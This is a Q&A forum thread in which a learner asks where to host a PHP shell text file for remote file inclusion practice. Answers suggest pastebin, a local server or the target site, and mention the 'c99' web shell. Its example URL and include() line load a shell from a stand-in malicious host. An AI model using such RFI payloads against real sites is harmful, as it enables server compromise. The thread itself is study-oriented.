# How to upload .txt file to use for RFI/LFI?

Tags: php

So I am learning about RFI, LFI and got a simple question. Many examples show how it's needed to insert PHP file into page to extract different information. My question is where do I upload this .txt file? For example as you can see:

```
http://www.vulnerable.com/test.php?file=http://www.malicious.com/shell.txt
```

It's for my studies, and I searched a lot but can't figure this simple thing. Are there a specific websites for that?

Thanks.

Answer (score 4, accepted):

**You would be uploading this textfile on an abondoned russian server which you access through Tor and hacked anonymouse proxies, from a cybercafé where you don't have to register to the owner of the shop and there is no logging, wearing your trenchcoat and a goats mask on halloween.**

Google for "c99 php shell".

If you put the PHP code in the txt file, into a php file on a server with PHP configured, it would be rendered before. About a few years ago, you could have googled for sites and found 5 vulnerable sites per page. **PHP countered** this by disabling remote file inclusion through `include` and other security enhencements.

On 99% of the servers, `include('http://www.malicious.com/shell.txt');` is not possible anymore.

The PHP file `http://www.vulnerable.com/test.php?file=` would be the one you want to hack.

Forget it,.. RFI is outdated, whack and there are by far cooler ways to hack, mostly SQL Injection or CSF.

For testing, the file can be uploaded anywhere, freespace, your local server (Google: xampp, wampserver), Google Drive, or evenen the site you want to test, e.g. http://www.vulnerable.com/test.php?file=http://www.vulnerable.com/shell.txt.

You can also try pastebin.com for simplicity: http://pastebin.com/ then find the raw link to the paste text, like: http://pastebin.com/raw.php?i=GK9m8dAL

Comment: Thanks Dan. In my case, website if specifically designed to try and exploit such vulnerabilities (for studies) that's why it's not the case there.

Comment: So you can upload this file anywhere, your own server, your homeserver, freespace, or even google drive, etc...

Comment: Yes, but I thought it's supposed to have filename.txt in the end of the link when it's uploaded? Most upload services does not make that in the link. Or I just don't understand something here.

Comment: The name doesn't matter, the only important thing is that the PHP inside does not get rendered.

Answer (score 1):

If I understand you correctly: What you show is just an example. It demonstrates that the php script "test.php" could be a vulnerability because it could be misused by "shell.txt" (RFI).

"www.malicious.com" is not a "real" address.

Comment: Yes, exactly. I just want to know where exactly do I upload that .txt file with my code, so I can do just like in that example. And yes, it's not a real address.

Comment: Where do you store the php file?

Comment: I don't store it nowhere. That's what I am asking, how am I supposed to store or upload it? :)

Comment: On a server... If you have no access to a webserver you could install one locally. Use something like xampp (http://www.apachefriends.org/en/xampp.html) you could upload/store the txt file on the same server.